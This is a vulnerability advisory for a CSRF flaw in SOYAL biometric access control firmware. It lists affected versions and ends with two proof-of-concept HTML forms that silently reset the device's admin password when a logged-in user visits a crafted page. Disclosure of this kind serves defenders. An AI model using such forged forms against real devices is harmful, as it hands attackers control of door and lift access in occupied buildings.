SOYAL Biometric Access Control System 5.0 CSRF Change Admin Password  
Vendor: SOYAL Technology Co., Ltd  
Product web page: |  
Affected version: AR-727 i/CM - F/W: 5.0   
AR837E/EF - F/W: 4.3  
AR725Ev2 - F/W: 4.3 191231  
AR331/725E - F/W: 4.2  
AR837E/EF - F/W: 4.1  
AR-727CM /i - F/W: 4.09  
AR-727CM /i - F/W: 4.06  
AR-837E - F/W: 3.03  
Summary: Soyal Access systems are built into Raytel Door Entry Systems  
and are providing access and lift control to many buildings from public  
and private apartment blocks to prestigious public buildings.  
Desc: The application interface allows users to perform certain actions  
via HTTP requests without performing any validity checks to verify the  
requests. This can be exploited to perform certain actions with administrative  
privileges if a logged-in user visits a malicious web site.  
Tested on: SOYAL Technology WebServer 2.0  
SOYAL Serial Device Server 4.03A   
SOYAL Serial Device Server 4.01n  
SOYAL Serial Device Server 3.07n  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2021-5632  
Advisory URL:  
<form action="" method="POST">  
<input type="hidden" name="pw" value="test123" />  
<input type="hidden" name="pw2" value="test123" />  
<input type="submit" value="Forge me!" />  
<form action="" method="POST">  
<input type="hidden" name="pw" value="drugtest123" />  
<input type="hidden" name="pw2" value="drugtest123" />  
<input type="submit" value="Forge me!" />